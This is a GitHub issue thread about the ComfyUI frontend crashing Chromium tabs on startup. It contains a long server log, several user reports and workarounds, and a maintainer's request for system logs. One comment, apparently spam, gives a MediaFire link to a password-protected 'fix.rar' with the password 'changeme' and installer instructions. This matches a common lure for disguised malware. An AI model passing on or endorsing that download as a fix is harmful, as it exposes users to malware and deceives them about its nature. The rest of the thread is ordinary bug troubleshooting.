### ISSUE TITLE
[Bug]: 

### ISSUE THREAD

**Issue by lunanane** [Comfy-Org/ComfyUI_frontend#641]
### Frontend Version

latest

### Expected Behavior

After starting the run_nvidia_gpu.bat it should start the frontend in chrome, as it did two days ago without changes in between.

### Actual Behavior

Multiple users report the same issue in this reddit post: https://www.reddit.com/r/comfyui/comments/1f0i6jc/comfyui_stopped_working_strangly_chrome/

The browser opens with an error massage. If you have metamask isntalled, metamask gives a warning

![comfyuibreak](https://github.com/user-attachments/assets/e4c6693d-39ce-45c9-aedf-3445c3bb73d1)
![comfyui-stopped-working-strangly-chrome-v0-gyigefn4cpkd1 (1)](https://github.com/user-attachments/assets/71bcd4e8-683e-483b-9a78-ef220091ebb6)

However, even with Metamask uninstalled, problem remains. 

### Steps to Reproduce

?

### Debug Logs

```powershell
E:\stable_diffusion\ComfyUI_windows_portable_2>.\python_embeded\python.exe -s ComfyUI\main.py --windows-standalone-build
[START] Security scan
[DONE] Security scan
## ComfyUI-Manager: installing dependencies done.
** ComfyUI startup time: 2024-08-26 17:11:16.879598
** Platform: Windows
** Python version: 3.11.9 (tags/v3.11.9:de54cf5, Apr  2 2024, 10:12:12) [MSC v.1938 64 bit (AMD64)]
** Python executable: E:\stable_diffusion\ComfyUI_windows_portable_2\python_embeded\python.exe
** ComfyUI Path: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI
** Log path: E:\stable_diffusion\ComfyUI_windows_portable_2\comfyui.log

Prestartup times for custom nodes:
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\rgthree-comfy
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Marigold
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Easy-Use
   2.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Manager

Total VRAM 16375 MB, total RAM 32721 MB
pytorch version: 2.3.1+cu121
Set vram state to: NORMAL_VRAM
Device: cuda:0 NVIDIA RTX A4000 : cudaMallocAsync
Using pytorch cross attention
[Prompt Server] web root: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\web
Adding extra search path checkpoints E:/stable_diffusion/stable-diffusion-webui\models/Stable-diffusion
Adding extra search path configs E:/stable_diffusion/stable-diffusion-webui\models/Stable-diffusion
Adding extra search path vae E:/stable_diffusion/stable-diffusion-webui\models/VAE
Adding extra search path loras E:/stable_diffusion/stable-diffusion-webui\models/Lora
Adding extra search path loras E:/stable_diffusion/stable-diffusion-webui\models/LyCORIS
Adding extra search path upscale_models E:/stable_diffusion/stable-diffusion-webui\models/ESRGAN
Adding extra search path upscale_models E:/stable_diffusion/stable-diffusion-webui\models/RealESRGAN
Adding extra search path upscale_models E:/stable_diffusion/stable-diffusion-webui\models/SwinIR
Adding extra search path embeddings E:/stable_diffusion/stable-diffusion-webui\embeddings
Adding extra search path hypernetworks E:/stable_diffusion/stable-diffusion-webui\models/hypernetworks
Adding extra search path controlnet E:/stable_diffusion/stable-diffusion-webui\models/ControlNet
Adding extra search path animatediff E:/stable_diffusion/stable-diffusion-webui\extensions/sd-webui-animatediff/model
Adding extra search path ipadapter E:/stable_diffusion/stable-diffusion-webui\models/ipadapter
Adding extra search path checkpoints E:\stable_diffusion\comfyui_models\models/checkpoints
Adding extra search path clip E:\stable_diffusion\comfyui_models\models/clip
Adding extra search path clip_vision E:\stable_diffusion\comfyui_models\models/clip_vision
Adding extra search path configs E:\stable_diffusion\comfyui_models\models/configs
Adding extra search path controlnet E:\stable_diffusion\comfyui_models\models/Controlnet
Adding extra search path embeddings E:\stable_diffusion\comfyui_models\embeddings
Adding extra search path loras E:\stable_diffusion\comfyui_models\models/Loras
Adding extra search path upscale_models E:\stable_diffusion\comfyui_models\models/upscale_models
Adding extra search path vae E:\stable_diffusion\comfyui_models\models/vae
Adding extra search path depthanything E:\stable_diffusion\comfyui_models\models/depthanything
Adding extra search path IC-Light E:\stable_diffusion\comfyui_models\models/IC-Light
Adding extra search path animatediff_models E:\stable_diffusion\comfyui_models\models/animatediff
Adding extra search path animatediff_motion_lora E:\stable_diffusion\comfyui_models\models/animatediff_motion_lora
Adding extra search path deepbump E:\stable_diffusion\comfyui_models\models/deepbump
Adding extra search path diffusers E:\stable_diffusion\comfyui_models\models/diffusers
Adding extra search path facedetection E:\stable_diffusion\comfyui_models\models/facedetection
Adding extra search path facerestore_models E:\stable_diffusion\comfyui_models\models/facerestore_models
Adding extra search path grounding-dino E:\stable_diffusion\comfyui_models\models/grounding-dino
Adding extra search path insightface E:\stable_diffusion\comfyui_models\models/insightface
Adding extra search path ipadapter E:\stable_diffusion\comfyui_models\models/ipadapter
Adding extra search path luts E:\stable_diffusion\comfyui_models\models/luts
Adding extra search path mmdets E:\stable_diffusion\comfyui_models\models/mmdets
Adding extra search path RGT E:\stable_diffusion\comfyui_models\models/RGT
Adding extra search path sams E:\stable_diffusion\comfyui_models\models/sams
Adding extra search path style_models E:\stable_diffusion\comfyui_models\models/style_models
Adding extra search path ultralytics E:\stable_diffusion\comfyui_models\models/ultralytics
Adding extra search path unet E:\stable_diffusion\comfyui_models\models/unet
Adding extra search path vae_approx E:\stable_diffusion\comfyui_models\models/vae_approx
Adding extra search path LLM E:\stable_diffusion\comfyui_models\models/LLM/checkpoints
Error:
[WinError 183] Eine Datei kann nicht erstellt werden, wenn sie bereits vorhanden ist: 'E:\\stable_diffusion\\ComfyUI_windows_portable_2\\ComfyUI\\custom_nodes\\ComfyLiterals\\js' -> 'E:\\stable_diffusion\\ComfyUI_windows_portable_2\\ComfyUI\\web\\extensions\\ComfyLiterals'
Failed to create symlink to E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\web\extensions\ComfyLiterals. Please copy the folder manually.
Source: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyLiterals\js
Target: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\web\extensions\ComfyLiterals
[AnimateDiff] - ERROR - No models available. Please download one and put it in models folder
Adding E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes to sys.path
Efficiency Nodes: Attempting to add Control Net options to the 'HiRes-Fix Script' Node (comfyui_controlnet_aux add-on)...Success!
Loaded Efficiency nodes from E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\efficiency-nodes-comfyui
Loaded ControlNetPreprocessors nodes from E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui_controlnet_aux
Loaded AdvancedControlNet nodes from E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Advanced-ControlNet
Loaded AnimateDiff from E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui-animatediff\animatediff/sliding_schedule.py
Loaded IPAdapter nodes from E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus
Loaded VideoHelperSuite from E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-VideoHelperSuite
### Loading: ComfyUI-Impact-Pack (V6.2)
### Loading: ComfyUI-Impact-Pack (Subpack: V0.6)
### Loading: ComfyUI-Impact-Pack (V6.2)
Loaded ImpactPack nodes from [Impact Pack] Wildcards loading done.E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Impact-Pack

[Impact Pack] Wildcards loading done.
xFormers not available
xFormers not available
Comfy-Easy-Use v1.2.2: Loaded
### Loading: ComfyUI-Impact-Pack (V6.2)
[Impact Pack] Wildcards loading done.
Total VRAM 16375 MB, total RAM 32721 MB
pytorch version: 2.3.1+cu121
Set vram state to: NORMAL_VRAM
Device: cuda:0 NVIDIA RTX A4000 : cudaMallocAsync
### Loading: ComfyUI-Manager (V2.48.8)
### ComfyUI Revision: 2614 [9230f658] | Released on '2024-08-25'
Failed to auto update `Quality of Life Suit`
QualityOfLifeSuit_Omar92_DIR: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-QualityOfLifeSuit_Omar92
no module 'xformers'. Processing without...
no module 'xformers'. Processing without...
Workspace manager - Openning file hash dict
🦄🦄Loading: Workspace Manager (V2.1.0)

From Bmad Custom Nodes
 Loaded 124 nodes:
  + api nodes (14)
  + simple utility nodes (58)
  + CV nodes (49)
  + color clip ade20k node (1)
  + extension dependent nodes (2)

------------------------------------------
Comfyroll Studio v1.76 :  175 Nodes Loaded
------------------------------------------
** For changes, please see patch notes at https://github.com/Suzie1/ComfyUI_Comfyroll_CustomNodes/blob/main/Patch_Notes.md
** For help, please see the wiki at https://github.com/Suzie1/ComfyUI_Comfyroll_CustomNodes/wiki
------------------------------------------
FizzleDorf Custom Nodes: Loaded
[comfy_mtb] | INFO -> loaded 81 nodes successfuly
[comfy_mtb] | INFO -> Some nodes (5) could not be loaded. This can be ignored, but go to http://127.0.0.1:8188/mtb if you want more information.
WARNING: Could not find OPENAI_API_KEY in .env, disabling gpt prompt generation.
Using pytorch cross attention
Total VRAM 16375 MB, total RAM 32721 MB
Set vram state to: NORMAL_VRAM
Device: cuda:0 NVIDIA RTX A4000 : cudaMallocAsync
VAE dtype: torch.bfloat16
Started worker with PID 10028
 ComfyUI  Fooocus Nodes  : loaded
2024-08-26 17:12:08.879 | WARNING  | Jovimetrix.core.utility:<module>:51 - no gifski support

[rgthree] Loaded 42 exciting nodes.
[rgthree] NOTE: Will NOT use rgthree's optimized recursive execution as ComfyUI has changed.

Searge-SDXL v4.3.1 in E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\SeargeSDXL
WAS Node Suite: BlenderNeko's Advanced CLIP Text Encode found, attempting to enable `CLIPTextEncode` support.
WAS Node Suite: `CLIPTextEncode (BlenderNeko Advanced + NSP)` node enabled under `WAS Suite/Conditioning` menu.
WAS Node Suite: OpenCV Python FFMPEG support is enabled
WAS Node Suite Warning: `ffmpeg_bin_path` is not set in `E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json` config file. Will attempt to use system ffmpeg binaries if available.
WAS Node Suite: Finished. Loaded 218 nodes successfully.

        "Believe in yourself, take on your challenges, and dig deep within yourself to conquer fears." - Chantal Sutherland


Import times for custom nodes:
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\efficiency-nodes-comfyui
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\cg-use-everywhere
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-sampler-lcm-alternative
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Logic
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\sdxl_prompt_styler
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui-prompt-composer
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\sd-dynamic-thresholding
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-YOLO
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_ADV_CLIP_emb
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\stability-ComfyUI-nodes
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-post-processing-nodes
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\websocket_image_save.py
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Eagle-PNGInfo
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-VideoHelperSuite
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui_controlnet_aux
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-AutomaticCFG
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyLiterals
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_JPS-Nodes
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUi_NNLatentUpscale
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui-animatediff
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-QualityOfLifeSuit_Omar92
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_experiments
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Latent-Modifiers
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyMath
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Impact-Pack
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Kolors-MZ
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfy-image-saver
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-LogicUtils
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\x-flux-comfyui
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_essentials
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Custom-Scripts
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_UltimateSDUpscale
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Advanced-ControlNet
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui-various
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Frame-Interpolation
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-DepthAnythingV2
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Marigold
   0.0 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-GlifNodes
   0.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\rgthree-comfy
   0.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui_bmad_nodes
   0.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-AnimateDiff-Evolved
   0.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-KJNodes
   0.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-KwaiKolorsWrapper
   0.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_bitsandbytes_NF4
   0.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_Comfyroll_CustomNodes
   0.1 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_smZNodes
   0.2 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\SeargeSDXL
   0.2 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\facerestore_cf
   0.3 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui-workspace-manager
   0.3 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\Fooocus_Nodes
   0.5 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Manager
   0.6 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyWarp
   0.9 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-Easy-Use
   1.3 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI_FizzNodes
   2.4 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\ComfyUI-SUPIR
   2.4 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\eden_comfy_pipelines
   2.7 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\was-node-suite-comfyui
   3.5 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\Jovimetrix
   3.9 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfyui-art-venture
  22.3 seconds: E:\stable_diffusion\ComfyUI_windows_portable_2\ComfyUI\custom_nodes\comfy_mtb

Starting server

To see the GUI go to: http://127.0.0.1:8188
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/alter-list.json
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/model-list.json
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/github-stats.json
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/extension-node-map.json
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/custom-node-list.json
HTTP Request: GET https://api.openai.com/v1/models "HTTP/1.1 401 Unauthorized"
Error: OpenAI API key is invalid OpenAI features wont work for you
QualityOfLifeSuit_Omar92::NSP ready
[comfy_mtb] | INFO -> Found multiple match, we will pick the last E:\stable_diffusion\comfyui_models\models/upscale_models
['E:\\stable_diffusion\\ComfyUI_windows_portable_2\\ComfyUI\\models\\upscale_models', 'E:/stable_diffusion/stable-diffusion-webui\\models/ESRGAN', 'E:/stable_diffusion/stable-diffusion-webui\\models/RealESRGAN', 'E:/stable_diffusion/stable-diffusion-webui\\models/SwinIR', 'E:\\stable_diffusion\\comfyui_models\\models/upscale_models']
[ERROR:0@66.933] global obsensor_uvc_stream_channel.cpp:156 cv::obsensor::getStreamChannelGroup Camera index out of range
[ERROR:0@66.943] global obsensor_uvc_stream_channel.cpp:156 cv::obsensor::getStreamChannelGroup Camera index out of range
[]
[]
Exception in callback _ProactorBasePipeTransport._call_connection_lost(None)
handle: <Handle _ProactorBasePipeTransport._call_connection_lost(None)>
Traceback (most recent call last):
  File "asyncio\events.py", line 84, in _run
  File "asyncio\proactor_events.py", line 165, in _call_connection_lost
ConnectionResetError: [WinError 10054] Eine vorhandene Verbindung wurde vom Remotehost geschlossen
```

### Browser Logs

I  cannot retrieve any information from browser dev console.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by without-ordinary** [comment]
I also get the tab crash a lot since updating to the new frontend. Can still repo on a clean install of ComfyUI f1c2301697cb1cd538f8d4190741935548bb6734 (current head as of writing) with only Manager installed.

If I hold the shift key while the tab load, somehow that causes it to load without crashing the chromium tab process, and it will remain working for the rest of the Chrome session. I have no clue why that works, but its been my consistent workaround for the past couple weeks when running with the new frontend enabled.

Does not occur in Firefox, but FF gives me other new issues that made it unusable with the new frontend, like extremely laggy canvas even with the most minimum of workflow 7 stock nodes. FF generally does not like large amounts of image data anyway and is the primary reason I have Chrome installed.

**Comment by without-ordinary** [comment]
Some extra details. Currently running Chrome 128.0.6613.113 (though have gone though at least 3 updates since) on Ubuntu 22.04. Going from the various comments elsewhere, it sounds like a lot of them are running Windows and its any Chromium based browser.

I've been unable to do any diagnosis on Chrome since it crashes the tab process before any console output is registered during page load.

**Comment by SirVeggie** [comment]
You should always set the version in an issue to the real version, and not something like latest, since by the time someone looks into it, the version has already changed and now it's incorrect no longer the latest.

**Comment by Kadah** [comment]
Getting the tab crash sometimes on both c27ebeb1c2b7f163973f1dc9c57ee035214d6737, current head, and c6812947e98eb384250575d94108d9eb747765d9, which is my local "stable" with all the my installed custom nodes. Once it gets past the crash once, stays working for the duration of that tab and through refreshes, but not Chrome restarts. Opening additional instance of UI in another tab may have the same issue.

Was also able to repo on c27ebeb1c2b7f163973f1dc9c57ee035214d6737 on a fresh clean install and an new incognito session on Chrome 128.0.6613.119 with extensions disabled. As Without noted, can't get any console output out of Chrome since the tab crashes too soon. Nothing of note in the console output for ComfyUI.
```
Set cuda device to: 0
Total VRAM 24111 MB, total RAM 128698 MB
pytorch version: 2.4.0+cu121
Set vram state to: NORMAL_VRAM
Device: cuda:0 NVIDIA GeForce RTX 4090 : cudaMallocAsync
Using pytorch cross attention
[Prompt Server] web root: /home/kadah/ai/ComfyUI_clean_test/web
Starting server

To see the GUI go to: http://127.0.0.1:8189
```

Switching back to the old front end fixes this.

**Comment by christian-byrne** [comment]
> Getting the tab crash sometimes on both c27ebeb1c2b7f163973f1dc9c57ee035214d6737, current head, and c6812947e98eb384250575d94108d9eb747765d9, which is my local "stable" with all the my installed custom nodes. Once it gets past the crash once, stays working for the duration of that tab and through refreshes, but not Chrome restarts. Opening additional instance of UI in another tab may have the same issue.
> 
> Was also able to repo on c27ebeb1c2b7f163973f1dc9c57ee035214d6737 on a fresh clean install and an new incognito session on Chrome 128.0.6613.119 with extensions disabled. As Without noted, can't get any console output out of Chrome since the tab crashes too soon. Nothing of note in the console output for ComfyUI.
> 
> ```
> Set cuda device to: 0
> Total VRAM 24111 MB, total RAM 128698 MB
> pytorch version: 2.4.0+cu121
> Set vram state to: NORMAL_VRAM
> Device: cuda:0 NVIDIA GeForce RTX 4090 : cudaMallocAsync
> Using pytorch cross attention
> [Prompt Server] web root: /home/kadah/ai/ComfyUI_clean_test/web
> Starting server
> 
> To see the GUI go to: http://127.0.0.1:8189
> ```
> 
> Switching back to the old front end fixes this.

If possible, report the sys logs using `tail -f /var/log/syslog | grep -i chrome`, along with OS/system info. I can only reproduce the issue when using certain custom nodes.
